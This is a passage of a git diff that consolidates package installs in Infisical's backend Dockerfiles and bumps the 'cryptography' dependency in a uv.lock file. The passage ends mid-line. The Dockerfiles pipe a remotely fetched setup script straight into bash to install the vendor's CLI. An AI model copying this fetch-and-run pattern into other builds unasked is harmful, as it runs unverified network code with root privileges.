unzip - -# Install libaio (required for Oracle Instant Client) - architecture-specific for Debian Trixie + unzip \ + libaio1t64 \ + unixodbc \ + unixodbc-dev \ + freetds-dev \ + freetds-bin \ + tdsodbc \ + opensc \ + smbclient \ + && curl -1sLf 'https://artifacts-cli.infisical.com/setup.deb.sh' | bash \ + && apt-get update && apt-get install -y infisical=0.43.14 \ + && rm -rf /var/lib/apt/lists/* + +# Create libaio symlink for Oracle Instant Client RUN ARCH=$(dpkg --print-architecture) && \ if [ "$ARCH" = "arm64" ]; then \ - apt-get install -y libaio1t64 && \ ln -sf /lib/aarch64-linux-gnu/libaio.so.1t64 /lib/aarch64-linux-gnu/libaio.so.1; \ else \ - apt-get install -y libaio1t64 && \ ln -sf /lib/x86_64-linux-gnu/libaio.so.1t64 /lib/x86_64-linux-gnu/libaio.so.1; \ fi -# Install dependencies for TDS driver (required for SAP ASE dynamic secrets) -RUN apt-get install -y \ - unixodbc \ - unixodbc-dev \ - freetds-dev \ - freetds-bin \ - tdsodbc - RUN printf "[FreeTDS]\nDescription = FreeTDS Driver\nDriver = /usr/lib/x86_64-linux-gnu/odbc/libtdsodbc.so\nSetup = /usr/lib/x86_64-linux-gnu/odbc/libtdsodbc.so\nFileUsage = 1\n" > /etc/odbcinst.ini # Build and install SoftHSM2 @@ -59,9 +60,6 @@ RUN git checkout ${SOFTHSM2_VERSION} -b ${SOFTHSM2_VERSION} \ WORKDIR /root RUN rm -fr ${SOFTHSM2_SOURCES} -# Install pkcs11-tool -RUN apt-get install -y opensc - # Install Oracle Instant Client for OracleDB mTLS (Wallet) support RUN mkdir -p /opt/oracle && \ ARCH=$(dpkg --print-architecture) && \ @@ -92,14 +90,6 @@ RUN wget -q https://github.com/openssl/openssl/releases/download/openssl-3.5.6/o # ? 
App setup -# Install smbclient for Windows SMB operations -RUN apt-get update && apt-get install -y smbclient - -# Install Infisical CLI -RUN curl -1sLf 'https://artifacts-cli.infisical.com/setup.deb.sh' | bash && \ - apt-get update && \ - apt-get install -y infisical=0.43.14 - WORKDIR /app COPY package.json package.json diff --git a/backend/Dockerfile.dev.fips b/backend/Dockerfile.dev.fips index 911799f17e8..20fd369f017 100644 --- a/backend/Dockerfile.dev.fips +++ b/backend/Dockerfile.dev.fips @@ -7,7 +7,7 @@ ARG SOFTHSM2_VERSION=2.5.0 ENV SOFTHSM2_VERSION=${SOFTHSM2_VERSION} \ SOFTHSM2_SOURCES=/tmp/softhsm2 -# Install build dependencies including python3 (required for pkcs11js and partially TDS driver) +# Install all build and runtime dependencies RUN apt-get update && apt-get install -y \ build-essential \ autoconf \ @@ -23,25 +23,24 @@ RUN apt-get update && apt-get install -y \ pkg-config \ perl \ wget \ - unzip - -# Install libaio (required for Oracle Instant Client) - architecture-specific for Debian Trixie -RUN ARCH=$(dpkg --print-architecture) && \ - if [ "$ARCH" = "arm64" ]; then \ - apt-get install -y libaio1t64 && \ - ln -sf /lib/aarch64-linux-gnu/libaio.so.1t64 /lib/aarch64-linux-gnu/libaio.so.1; \ - else \ - apt-get install -y libaio1t64 && \ - ln -sf /lib/x86_64-linux-gnu/libaio.so.1t64 /lib/x86_64-linux-gnu/libaio.so.1; \ - fi - -# Install dependencies for TDS driver (required for SAP ASE dynamic secrets) -RUN apt-get install -y \ + unzip \ + libaio1t64 \ unixodbc \ unixodbc-dev \ freetds-dev \ freetds-bin \ - tdsodbc + tdsodbc \ + opensc \ + smbclient \ + && curl -1sLf 'https://artifacts-cli.infisical.com/setup.deb.sh' | bash \ + && apt-get update && apt-get install -y infisical=0.43.14 \ + && rm -rf /var/lib/apt/lists/* + +# Create libaio symlink for Oracle Instant Client +RUN ARCH=$(dpkg --print-architecture) && \ + if [ "$ARCH" = "arm64" ]; then \ + ln -sf /lib/aarch64-linux-gnu/libaio.so.1t64 /lib/aarch64-linux-gnu/libaio.so.1; \ + fi RUN printf 
"[FreeTDS]\nDescription = FreeTDS Driver\nDriver = /usr/lib/x86_64-linux-gnu/odbc/libtdsodbc.so\nSetup = /usr/lib/x86_64-linux-gnu/odbc/libtdsodbc.so\nFileUsage = 1\n" > /etc/odbcinst.ini @@ -58,9 +57,6 @@ RUN git checkout ${SOFTHSM2_VERSION} -b ${SOFTHSM2_VERSION} \ WORKDIR /root RUN rm -fr ${SOFTHSM2_SOURCES} -# Install pkcs11-tool -RUN apt-get install -y opensc - # Install Oracle Instant Client for OracleDB mTLS (Wallet) support RUN mkdir -p /opt/oracle && \ ARCH=$(dpkg --print-architecture) && \ @@ -81,9 +77,10 @@ WORKDIR /openssl-build RUN wget https://www.openssl.org/source/openssl-3.1.2.tar.gz \ && tar -xf openssl-3.1.2.tar.gz \ && cd openssl-3.1.2 \ - && ./Configure enable-fips \ + && ./Configure enable-fips --libdir=lib \ && make \ && make install_fips \ + && test -f /usr/local/lib/ossl-modules/fips.so \ && cd / \ && rm -rf /openssl-build \ && apt-get clean \ @@ -103,14 +100,6 @@ RUN wget -q https://github.com/openssl/openssl/releases/download/openssl-3.5.6/o # ? App setup -# Install smbclient for Windows SMB operations -RUN apt-get update && apt-get install -y smbclient - -# Install Infisical CLI -RUN curl -1sLf 'https://artifacts-cli.infisical.com/setup.deb.sh' | bash && \ - apt-get update && \ - apt-get install -y infisical=0.43.14 - WORKDIR /app COPY package.json package.json diff --git a/backend/bdd/uv.lock b/backend/bdd/uv.lock index 49e1fca7352..67d2303a5fc 100644 --- a/backend/bdd/uv.lock +++ b/backend/bdd/uv.lock @@ -230,58 +230,55 @@ wheels = [ [[package]] name = "cryptography" -version = "46.0.3" +version = "46.0.7" source = { registry = "https://pypi.org/simple" } dependencies = [ { name = "cffi", marker = "platform_python_implementation != 'PyPy'" }, ] -sdist = { url = "https://files.pythonhosted.org/packages/9f/33/c00162f49c0e2fe8064a62cb92b93e50c74a72bc370ab92f86112b33ff62/cryptography-46.0.3.tar.gz", hash = "sha256:a8b17438104fed022ce745b362294d9ce35b4c2e45c1d958ad4a4b019285f4a1", size = 749258, upload-time = "2025-10-15T23:18:31.74Z" } 
-wheels = [ - { url = "https://files.pythonhosted.org/packages/1d/42/9c391dd801d6cf0d561b5890549d4b27bafcc53b39c31a817e69d87c625b/cryptography-46.0.3-cp311-abi3-macosx_10_9_universal2.whl", hash = "sha256:109d4ddfadf17e8e7779c39f9b18111a09efb969a301a31e987416a0191ed93a", size = 7225004, upload-time = "2025-10-15T23:16:52.239Z" }, - { url = "https://files.pythonhosted.org/packages/1c/67/38769ca6b65f07461eb200e85fc1639b438bdc667be02cf7f2cd6a64601c/cryptography-46.0.3-cp311-abi3-manylinux2014_aarch64.manylinux_2_17_aarch64.whl", hash = "sha256:09859af8466b69bc3c27bdf4f5d84a665e0f7ab5088412e9e2ec49758eca5cbc", size = 4296667, upload-time = "2025-10-15T23:16:54.369Z" }, - { url = "https://files.pythonhosted.org/packages/5c/49/498c86566a1d80e978b42f0d702795f69887005548c041636df6ae1ca64c/cryptography-46.0.3-cp311-abi3-manylinux2014_x86_64.manylinux_2_17_x86_64.whl", hash = "sha256:01ca9ff2885f3acc98c29f1860552e37f6d7c7d013d7334ff2a9de43a449315d", size = 4450807, upload-time = "2025-10-15T23:16:56.414Z" }, - { url = "https://files.pythonhosted.org/packages/4b/0a/863a3604112174c8624a2ac3c038662d9e59970c7f926acdcfaed8d61142/cryptography-46.0.3-cp311-abi3-manylinux_2_28_aarch64.whl", hash = "sha256:6eae65d4c3d33da080cff9c4ab1f711b15c1d9760809dad6ea763f3812d254cb", size = 4299615, upload-time = "2025-10-15T23:16:58.442Z" }, - { url = "https://files.pythonhosted.org/packages/64/02/b73a533f6b64a69f3cd3872acb6ebc12aef924d8d103133bb3ea750dc703/cryptography-46.0.3-cp311-abi3-manylinux_2_28_armv7l.manylinux_2_31_armv7l.whl", hash = "sha256:e5bf0ed4490068a2e72ac03d786693adeb909981cc596425d09032d372bcc849", size = 4016800, upload-time = "2025-10-15T23:17:00.378Z" }, - { url = "https://files.pythonhosted.org/packages/25/d5/16e41afbfa450cde85a3b7ec599bebefaef16b5c6ba4ec49a3532336ed72/cryptography-46.0.3-cp311-abi3-manylinux_2_28_ppc64le.whl", hash = "sha256:5ecfccd2329e37e9b7112a888e76d9feca2347f12f37918facbb893d7bb88ee8", size = 4984707, upload-time = "2025-10-15T23:17:01.98Z" }, - { 
url = "https://files.pythonhosted.org/packages/c9/56/e7e69b427c3878352c2fb9b450bd0e19ed552753491d39d7d0a2f5226d41/cryptography-46.0.3-cp311-abi3-manylinux_2_28_x86_64.whl", hash = "sha256:a2c0cd47381a3229c403062f764160d57d4d175e022c1df84e168c6251a22eec", size = 4482541, upload-time = "2025-10-15T23:17:04.078Z" }, - { url = "https://files.pythonhosted.org/packages/78/f6/50736d40d97e8483172f1bb6e698895b92a223dba513b0ca6f06b2365339/cryptography-46.0.3-cp311-abi3-manylinux_2_34_aarch64.whl", hash = "sha256:549e234ff32571b1f4076ac269fcce7a808d3bf98b76c8dd560e42dbc66d7d91", size = 4299464, upload-time = "2025-10-15T23:17:05.483Z" }, - { url = "https://files.pythonhosted.org/packages/00/de/d8e26b1a855f19d9994a19c702fa2e93b0456beccbcfe437eda00e0701f2/cryptography-46.0.3-cp311-abi3-manylinux_2_34_ppc64le.whl", hash = "sha256:c0a7bb1a68a5d3471880e264621346c48665b3bf1c3759d682fc0864c540bd9e", size = 4950838, upload-time = "2025-10-15T23:17:07.425Z" }, - { url = "https://files.pythonhosted.org/packages/8f/29/798fc4ec461a1c9e9f735f2fc58741b0daae30688f41b2497dcbc9ed1355/cryptography-46.0.3-cp311-abi3-manylinux_2_34_x86_64.whl", hash = "sha256:10b01676fc208c3e6feeb25a8b83d81767e8059e1fe86e1dc62d10a3018fa926", size = 4481596, upload-time = "2025-10-15T23:17:09.343Z" }, - { url = "https://files.pythonhosted.org/packages/15/8d/03cd48b20a573adfff7652b76271078e3045b9f49387920e7f1f631d125e/cryptography-46.0.3-cp311-abi3-musllinux_1_2_aarch64.whl", hash = "sha256:0abf1ffd6e57c67e92af68330d05760b7b7efb243aab8377e583284dbab72c71", size = 4426782, upload-time = "2025-10-15T23:17:11.22Z" }, - { url = "https://files.pythonhosted.org/packages/fa/b1/ebacbfe53317d55cf33165bda24c86523497a6881f339f9aae5c2e13e57b/cryptography-46.0.3-cp311-abi3-musllinux_1_2_x86_64.whl", hash = "sha256:a04bee9ab6a4da801eb9b51f1b708a1b5b5c9eb48c03f74198464c66f0d344ac", size = 4698381, upload-time = "2025-10-15T23:17:12.829Z" }, - { url = 
"https://files.pythonhosted.org/packages/96/92/8a6a9525893325fc057a01f654d7efc2c64b9de90413adcf605a85744ff4/cryptography-46.0.3-cp311-abi3-win32.whl", hash = "sha256:f260d0d41e9b4da1ed1e0f1ce571f97fe370b152ab18778e9e8f67d6af432018", size = 3055988, upload-time = "2025-10-15T23:17:14.65Z" }, - { url = "https://files.pythonhosted.org/packages/7e/bf/80fbf45253ea585a1e492a6a17efcb93467701fa79e71550a430c5e60df0/cryptography-46.0.3-cp311-abi3-win_amd64.whl", hash = "sha256:a9a3008438615669153eb86b26b61e09993921ebdd75385ddd748702c5adfddb", size = 3514451, upload-time = "2025-10-15T23:17:16.142Z" }, - { url = "https://files.pythonhosted.org/packages/2e/af/9b302da4c87b0beb9db4e756386a7c6c5b8003cd0e742277888d352ae91d/cryptography-46.0.3-cp311-abi3-win_arm64.whl", hash = "sha256:5d7f93296ee28f68447397bf5198428c9aeeab45705a55d53a6343455dcb2c3c", size = 2928007, upload-time = "2025-10-15T23:17:18.04Z" }, - { url = "https://files.pythonhosted.org/packages/f5/e2/a510aa736755bffa9d2f75029c229111a1d02f8ecd5de03078f4c18d91a3/cryptography-46.0.3-cp314-cp314t-macosx_10_9_universal2.whl", hash = "sha256:00a5e7e87938e5ff9ff5447ab086a5706a957137e6e433841e9d24f38a065217", size = 7158012, upload-time = "2025-10-15T23:17:19.982Z" }, - { url = "https://files.pythonhosted.org/packages/73/dc/9aa866fbdbb95b02e7f9d086f1fccfeebf8953509b87e3f28fff927ff8a0/cryptography-46.0.3-cp314-cp314t-manylinux2014_aarch64.manylinux_2_17_aarch64.whl", hash = "sha256:c8daeb2d2174beb4575b77482320303f3d39b8e81153da4f0fb08eb5fe86a6c5", size = 4288728, upload-time = "2025-10-15T23:17:21.527Z" }, - { url = "https://files.pythonhosted.org/packages/c5/fd/bc1daf8230eaa075184cbbf5f8cd00ba9db4fd32d63fb83da4671b72ed8a/cryptography-46.0.3-cp314-cp314t-manylinux2014_x86_64.manylinux_2_17_x86_64.whl", hash = "sha256:39b6755623145ad5eff1dab323f4eae2a32a77a7abef2c5089a04a3d04366715", size = 4435078, upload-time = "2025-10-15T23:17:23.042Z" }, - { url = 
"https://files.pythonhosted.org/packages/82/98/d3bd5407ce4c60017f8ff9e63ffee4200ab3e23fe05b765cab805a7db008/cryptography-46.0.3-cp314-cp314t-manylinux_2_28_aarch64.whl", hash = "sha256:db391fa7c66df6762ee3f00c95a89e6d428f4d60e7abc8328f4fe155b5ac6e54", size = 4293460, upload-time = "2025-10-15T23:17:24.885Z" }, - { url = "https://files.pythonhosted.org/packages/26/e9/e23e7900983c2b8af7a08098db406cf989d7f09caea7897e347598d4cd5b/cryptography-46.0.3-cp314-cp314t-manylinux_2_28_armv7l.manylinux_2_31_armv7l.whl", hash = "sha256:78a97cf6a8839a48c49271cdcbd5cf37ca2c1d6b7fdd86cc864f302b5e9bf459", size = 3995237, upload-time = "2025-10-15T23:17:26.449Z" }, - { url = "https://files.pythonhosted.org/packages/91/15/af68c509d4a138cfe299d0d7ddb14afba15233223ebd933b4bbdbc7155d3/cryptography-46.0.3-cp314-cp314t-manylinux_2_28_ppc64le.whl", hash = "sha256:dfb781ff7eaa91a6f7fd41776ec37c5853c795d3b358d4896fdbb5df168af422", size = 4967344, upload-time = "2025-10-15T23:17:28.06Z" }, - { url = "https://files.pythonhosted.org/packages/ca/e3/8643d077c53868b681af077edf6b3cb58288b5423610f21c62aadcbe99f4/cryptography-46.0.3-cp314-cp314t-manylinux_2_28_x86_64.whl", hash = "sha256:6f61efb26e76c45c4a227835ddeae96d83624fb0d29eb5df5b96e14ed1a0afb7", size = 4466564, upload-time = "2025-10-15T23:17:29.665Z" }, - { url = "https://files.pythonhosted.org/packages/0e/43/c1e8726fa59c236ff477ff2b5dc071e54b21e5a1e51aa2cee1676f1c986f/cryptography-46.0.3-cp314-cp314t-manylinux_2_34_aarch64.whl", hash = "sha256:23b1a8f26e43f47ceb6d6a43115f33a5a37d57df4ea0ca295b780ae8546e8044", size = 4292415, upload-time = "2025-10-15T23:17:31.686Z" }, - { url = "https://files.pythonhosted.org/packages/42/f9/2f8fefdb1aee8a8e3256a0568cffc4e6d517b256a2fe97a029b3f1b9fe7e/cryptography-46.0.3-cp314-cp314t-manylinux_2_34_ppc64le.whl", hash = "sha256:b419ae593c86b87014b9be7396b385491ad7f320bde96826d0dd174459e54665", size = 4931457, upload-time = "2025-10-15T23:17:33.478Z" }, - { url = 
"https://files.pythonhosted.org/packages/79/30/9b54127a9a778ccd6d27c3da7563e9f2d341826075ceab89ae3b41bf5be2/cryptography-46.0.3-cp314-cp314t-manylinux_2_34_x86_64.whl", hash = "sha256:50fc3343ac490c6b08c0cf0d704e881d0d660be923fd3076db3e932007e726e3", size = 4466074, upload-time = "2025-10-15T23:17:35.158Z" }, - { url = "https://files.pythonhosted.org/packages/ac/68/b4f4a10928e26c941b1b6a179143af9f4d27d88fe84a6a3c53592d2e76bf/cryptography-46.0.3-cp314-cp314t-musllinux_1_2_aarch64.whl", hash = "sha256:22d7e97932f511d6b0b04f2bfd818d73dcd5928db509460aaf48384778eb6d20", size = 4420569, upload-time = "2025-10-15T23:17:37.188Z" }, - { url = "https://files.pythonhosted.org/packages/a3/49/3746dab4c0d1979888f125226357d3262a6dd40e114ac29e3d2abdf1ec55/cryptography-46.0.3-cp314-cp314t-musllinux_1_2_x86_64.whl", hash = "sha256:d55f3dffadd674514ad19451161118fd010988540cee43d8bc20675e775925de", size = 4681941, upload-time = "2025-10-15T23:17:39.236Z" }, - { url = "https://files.pythonhosted.org/packages/fd/30/27654c1dbaf7e4a3531fa1fc77986d04aefa4d6d78259a62c9dc13d7ad36/cryptography-46.0.3-cp314-cp314t-win32.whl", hash = "sha256:8a6e050cb6164d3f830453754094c086ff2d0b2f3a897a1d9820f6139a1f0914", size = 3022339, upload-time = "2025-10-15T23:17:40.888Z" }, - { url = "https://files.pythonhosted.org/packages/f6/30/640f34ccd4d2a1bc88367b54b926b781b5a018d65f404d409aba76a84b1c/cryptography-46.0.3-cp314-cp314t-win_amd64.whl", hash = "sha256:760f83faa07f8b64e9c33fc963d790a2edb24efb479e3520c14a45741cd9b2db", size = 3494315, upload-time = "2025-10-15T23:17:42.769Z" }, - { url = "https://files.pythonhosted.org/packages/ba/8b/88cc7e3bd0a8e7b861f26981f7b820e1f46aa9d26cc482d0feba0ecb4919/cryptography-46.0.3-cp314-cp314t-win_arm64.whl", hash = "sha256:516ea134e703e9fe26bcd1277a4b59ad30586ea90c365a87781d7887a646fe21", size = 2919331, upload-time = "2025-10-15T23:17:44.468Z" }, - { url = 
"https://files.pythonhosted.org/packages/fd/23/45fe7f376a7df8daf6da3556603b36f53475a99ce4faacb6ba2cf3d82021/cryptography-46.0.3-cp38-abi3-macosx_10_9_universal2.whl", hash = "sha256:cb3d760a6117f621261d662bccc8ef5bc32ca673e037c83fbe565324f5c46936", size = 7218248, upload-time = "2025-10-15T23:17:46.294Z" }, - { url = "https://files.pythonhosted.org/packages/27/32/b68d27471372737054cbd34c84981f9edbc24fe67ca225d389799614e27f/cryptography-46.0.3-cp38-abi3-manylinux2014_aarch64.manylinux_2_17_aarch64.whl", hash = "sha256:4b7387121ac7d15e550f5cb4a43aef2559ed759c35df7336c402bb8275ac9683", size = 4294089, upload-time = "2025-10-15T23:17:48.269Z" }, - { url = "https://files.pythonhosted.org/packages/26/42/fa8389d4478368743e24e61eea78846a0006caffaf72ea24a15159215a14/cryptography-46.0.3-cp38-abi3-manylinux2014_x86_64.manylinux_2_17_x86_64.whl", hash = "sha256:15ab9b093e8f09daab0f2159bb7e47532596075139dd74365da52ecc9cb46c5d", size = 4440029, upload-time = "2025-10-15T23:17:49.837Z" }, - { url = "https://files.pythonhosted.org/packages/5f/eb/f483db0ec5ac040824f269e93dd2bd8a21ecd1027e77ad7bdf6914f2fd80/cryptography-46.0.3-cp38-abi3-manylinux_2_28_aarch64.whl", hash = "sha256:46acf53b40ea38f9c6c229599a4a13f0d46a6c3fa9ef19fc1a124d62e338dfa0", size = 4297222, upload-time = "2025-10-15T23:17:51.357Z" }, - { url = "https://files.pythonhosted.org/packages/fd/cf/da9502c4e1912cb1da3807ea3618a6829bee8207456fbbeebc361ec38ba3/cryptography-46.0.3-cp38-abi3-manylinux_2_28_armv7l.manylinux_2_31_armv7l.whl", hash = "sha256:10ca84c4668d066a9878890047f03546f3ae0a6b8b39b697457b7757aaf18dbc", size = 4012280, upload-time = "2025-10-15T23:17:52.964Z" }, - { url = "https://files.pythonhosted.org/packages/6b/8f/9adb86b93330e0df8b3dcf03eae67c33ba89958fc2e03862ef1ac2b42465/cryptography-46.0.3-cp38-abi3-manylinux_2_28_ppc64le.whl", hash = "sha256:36e627112085bb3b81b19fed209c05ce2a52ee8b15d161b7c643a7d5a88491f3", size = 4978958, upload-time = "2025-10-15T23:17:54.965Z" }, - { url = 
"https://files.pythonhosted.org/packages/d1/a0/5fa77988289c34bdb9f913f5606ecc9ada1adb5ae870bd0d1054a7021cc4/cryptography-46.0.3-cp38-abi3-manylinux_2_28_x86_64.whl", hash = "sha256:1000713389b75c449a6e979ffc7dcc8ac90b437048766cef052d4d30b8220971", size = 4473714, upload-time = "2025-10-15T23:17:56.754Z" }, - { url = "https://files.pythonhosted.org/packages/14/e5/fc82d72a58d41c393697aa18c9abe5ae1214ff6f2a5c18ac470f92777895/cryptography-46.0.3-cp38-abi3-manylinux_2_34_aarch64.whl", hash = "sha256:b02cf04496f6576afffef5ddd04a0cb7d49cf6be16a9059d793a30b035f6b6ac", size = 4296970, upload-time = "2025-10-15T23:17:58.588Z" }, - { url = "https://files.pythonhosted.org/packages/78/06/5663ed35438d0b09056973994f1aec467492b33bd31da36e468b01ec1097/cryptography-46.0.3-cp38-abi3-manylinux_2_34_ppc64le.whl", hash = "sha256:71e842ec9bc7abf543b47cf86b9a743baa95f4677d22baa4c7d5c69e49e9bc04", size = 4940236, upload-time = "2025-10-15T23:18:00.897Z" }, - { url = "https://files.pythonhosted.org/packages/fc/59/873633f3f2dcd8a053b8dd1d38f783043b5fce589c0f6988bf55ef57e43e/cryptography-46.0.3-cp38-abi3-manylinux_2_34_x86_64.whl", hash = "sha256:402b58fc32614f00980b66d6e56a5b4118e6cb362ae8f3fda141ba4689bd4506", size = 4472642, upload-time = "2025-10-15T23:18:02.749Z" }, - { url = "https://files.pythonhosted.org/packages/3d/39/8e71f3930e40f6877737d6f69248cf74d4e34b886a3967d32f919cc50d3b/cryptography-46.0.3-cp38-abi3-musllinux_1_2_aarch64.whl", hash = "sha256:ef639cb3372f69ec44915fafcd6698b6cc78fbe0c2ea41be867f6ed612811963", size = 4423126, upload-time = "2025-10-15T23:18:04.85Z" }, - { url = "https://files.pythonhosted.org/packages/cd/c7/f65027c2810e14c3e7268353b1681932b87e5a48e65505d8cc17c99e36ae/cryptography-46.0.3-cp38-abi3-musllinux_1_2_x86_64.whl", hash = "sha256:3b51b8ca4f1c6453d8829e1eb7299499ca7f313900dd4d89a24b8b87c0a780d4", size = 4686573, upload-time = "2025-10-15T23:18:06.908Z" }, - { url = 
"https://files.pythonhosted.org/packages/0a/6e/1c8331ddf91ca4730ab3086a0f1be19c65510a33b5a441cb334e7a2d2560/cryptography-46.0.3-cp38-abi3-win32.whl", hash = "sha256:6276eb85ef938dc035d59b87c8a7dc559a232f954962520137529d77b18ff1df", size = 3036695, upload-time = "2025-10-15T23:18:08.672Z" }, - { url = "https://files.pythonhosted.org/packages/90/45/b0d691df20633eff80955a0fc7695ff9051ffce8b69741444bd9ed7bd0db/cryptography-46.0.3-cp38-abi3-win_amd64.whl", hash = "sha256:416260257577718c05135c55958b674000baef9a1c7d9e8f306ec60d71db850f", size = 3501720, upload-time = "2025-10-15T23:18:10.632Z" }, - { url = "https://files.pythonhosted.org/packages/e8/cb/2da4cc83f5edb9c3257d09e1e7ab7b23f049c7962cae8d842bbef0a9cec9/cryptography-46.0.3-cp38-abi3-win_arm64.whl", hash = "sha256:d89c3468de4cdc4f08a57e214384d0471911a3830fcdaf7a8cc587e42a866372", size = 2918740, upload-time = "2025-10-15T23:18:12.277Z" }, +sdist = { url = "https://files.pythonhosted.org/packages/47/93/ac8f3d5ff04d54bc814e961a43ae5b0b146154c89c61b47bb07557679b18/cryptography-46.0.7.tar.gz", hash = "sha256:e4cfd68c5f3e0bfdad0d38e023239b96a2fe84146481852dffbcca442c245aa5", size = 750652, upload-time = "2026-04-08T01:57:54.692Z" } +wheels = [ + { url = "https://files.pythonhosted.org/packages/0b/5d/4a8f770695d73be252331e60e526291e3df0c9b27556a90a6b47bccca4c2/cryptography-46.0.7-cp311-abi3-macosx_10_9_universal2.whl", hash = "sha256:ea42cbe97209df307fdc3b155f1b6fa2577c0defa8f1f7d3be7d31d189108ad4", size = 7179869, upload-time = "2026-04-08T01:56:17.157Z" }, + { url = "https://files.pythonhosted.org/packages/5f/45/6d80dc379b0bbc1f9d1e429f42e4cb9e1d319c7a8201beffd967c516ea01/cryptography-46.0.7-cp311-abi3-manylinux2014_aarch64.manylinux_2_17_aarch64.whl", hash = "sha256:b36a4695e29fe69215d75960b22577197aca3f7a25b9cf9d165dcfe9d80bc325", size = 4275492, upload-time = "2026-04-08T01:56:19.36Z" }, + { url = 
"https://files.pythonhosted.org/packages/4a/9a/1765afe9f572e239c3469f2cb429f3ba7b31878c893b246b4b2994ffe2fe/cryptography-46.0.7-cp311-abi3-manylinux2014_x86_64.manylinux_2_17_x86_64.whl", hash = "sha256:5ad9ef796328c5e3c4ceed237a183f5d41d21150f972455a9d926593a1dcb308", size = 4426670, upload-time = "2026-04-08T01:56:21.415Z" }, + { url = "https://files.pythonhosted.org/packages/8f/3e/af9246aaf23cd4ee060699adab1e47ced3f5f7e7a8ffdd339f817b446462/cryptography-46.0.7-cp311-abi3-manylinux_2_28_aarch64.whl", hash = "sha256:73510b83623e080a2c35c62c15298096e2a5dc8d51c3b4e1740211839d0dea77", size = 4280275, upload-time = "2026-04-08T01:56:23.539Z" }, + { url = "https://files.pythonhosted.org/packages/0f/54/6bbbfc5efe86f9d71041827b793c24811a017c6ac0fd12883e4caa86b8ed/cryptography-46.0.7-cp311-abi3-manylinux_2_28_ppc64le.whl", hash = "sha256:cbd5fb06b62bd0721e1170273d3f4d5a277044c47ca27ee257025146c34cbdd1", size = 4928402, upload-time = "2026-04-08T01:56:25.624Z" }, + { url = "https://files.pythonhosted.org/packages/2d/cf/054b9d8220f81509939599c8bdbc0c408dbd2bdd41688616a20731371fe0/cryptography-46.0.7-cp311-abi3-manylinux_2_28_x86_64.whl", hash = "sha256:420b1e4109cc95f0e5700eed79908cef9268265c773d3a66f7af1eef53d409ef", size = 4459985, upload-time = "2026-04-08T01:56:27.309Z" }, + { url = "https://files.pythonhosted.org/packages/f9/46/4e4e9c6040fb01c7467d47217d2f882daddeb8828f7df800cb806d8a2288/cryptography-46.0.7-cp311-abi3-manylinux_2_31_armv7l.whl", hash = "sha256:24402210aa54baae71d99441d15bb5a1919c195398a87b563df84468160a65de", size = 3990652, upload-time = "2026-04-08T01:56:29.095Z" }, + { url = "https://files.pythonhosted.org/packages/36/5f/313586c3be5a2fbe87e4c9a254207b860155a8e1f3cca99f9910008e7d08/cryptography-46.0.7-cp311-abi3-manylinux_2_34_aarch64.whl", hash = "sha256:8a469028a86f12eb7d2fe97162d0634026d92a21f3ae0ac87ed1c4a447886c83", size = 4279805, upload-time = "2026-04-08T01:56:30.928Z" }, + { url = 
"https://files.pythonhosted.org/packages/69/33/60dfc4595f334a2082749673386a4d05e4f0cf4df8248e63b2c3437585f2/cryptography-46.0.7-cp311-abi3-manylinux_2_34_ppc64le.whl", hash = "sha256:9694078c5d44c157ef3162e3bf3946510b857df5a3955458381d1c7cfc143ddb", size = 4892883, upload-time = "2026-04-08T01:56:32.614Z" }, + { url = "https://files.pythonhosted.org/packages/c7/0b/333ddab4270c4f5b972f980adef4faa66951a4aaf646ca067af597f15563/cryptography-46.0.7-cp311-abi3-manylinux_2_34_x86_64.whl", hash = "sha256:42a1e5f98abb6391717978baf9f90dc28a743b7d9be7f0751a6f56a75d14065b", size = 4459756, upload-time = "2026-04-08T01:56:34.306Z" }, + { url = "https://files.pythonhosted.org/packages/d2/14/633913398b43b75f1234834170947957c6b623d1701ffc7a9600da907e89/cryptography-46.0.7-cp311-abi3-musllinux_1_2_aarch64.whl", hash = "sha256:91bbcb08347344f810cbe49065914fe048949648f6bd5c2519f34619142bbe85", size = 4410244, upload-time = "2026-04-08T01:56:35.977Z" }, + { url = "https://files.pythonhosted.org/packages/10/f2/19ceb3b3dc14009373432af0c13f46aa08e3ce334ec6eff13492e1812ccd/cryptography-46.0.7-cp311-abi3-musllinux_1_2_x86_64.whl", hash = "sha256:5d1c02a14ceb9148cc7816249f64f623fbfee39e8c03b3650d842ad3f34d637e", size = 4674868, upload-time = "2026-04-08T01:56:38.034Z" }, + { url = "https://files.pythonhosted.org/packages/1a/bb/a5c213c19ee94b15dfccc48f363738633a493812687f5567addbcbba9f6f/cryptography-46.0.7-cp311-abi3-win32.whl", hash = "sha256:d23c8ca48e44ee015cd0a54aeccdf9f09004eba9fc96f38c911011d9ff1bd457", size = 3026504, upload-time = "2026-04-08T01:56:39.666Z" }, + { url = "https://files.pythonhosted.org/packages/2b/02/7788f9fefa1d060ca68717c3901ae7fffa21ee087a90b7f23c7a603c32ae/cryptography-46.0.7-cp311-abi3-win_amd64.whl", hash = "sha256:397655da831414d165029da9bc483bed2fe0e75dde6a1523ec2fe63f3c46046b", size = 3488363, upload-time = "2026-04-08T01:56:41.893Z" }, + { url = 
"https://files.pythonhosted.org/packages/7b/56/15619b210e689c5403bb0540e4cb7dbf11a6bf42e483b7644e471a2812b3/cryptography-46.0.7-cp314-cp314t-macosx_10_9_universal2.whl", hash = "sha256:d151173275e1728cf7839aaa80c34fe550c04ddb27b34f48c232193df8db5842", size = 7119671, upload-time = "2026-04-08T01:56:44Z" }, + { url = "https://files.pythonhosted.org/packages/74/66/e3ce040721b0b5599e175ba91ab08884c75928fbeb74597dd10ef13505d2/cryptography-46.0.7-cp314-cp314t-manylinux2014_aarch64.manylinux_2_17_aarch64.whl", hash = "sha256:db0f493b9181c7820c8134437eb8b0b4792085d37dbb24da050476ccb664e59c", size = 4268551, upload-time = "2026-04-08T01:56:46.071Z" }, + { url = "https://files.pythonhosted.org/packages/03/11/5e395f961d6868269835dee1bafec6a1ac176505a167f68b7d8818431068/cryptography-46.0.7-cp314-cp314t-manylinux2014_x86_64.manylinux_2_17_x86_64.whl", hash = "sha256:ebd6daf519b9f189f85c479427bbd6e9c9037862cf8fe89ee35503bd209ed902", size = 4408887, upload-time = "2026-04-08T01:56:47.718Z" }, + { url = "https://files.pythonhosted.org/packages/40/53/8ed1cf4c3b9c8e611e7122fb56f1c32d09e1fff0f1d77e78d9ff7c82653e/cryptography-46.0.7-cp314-cp314t-manylinux_2_28_aarch64.whl", hash = "sha256:b7b412817be92117ec5ed95f880defe9cf18a832e8cafacf0a22337dc1981b4d", size = 4271354, upload-time = "2026-04-08T01:56:49.312Z" }, + { url = 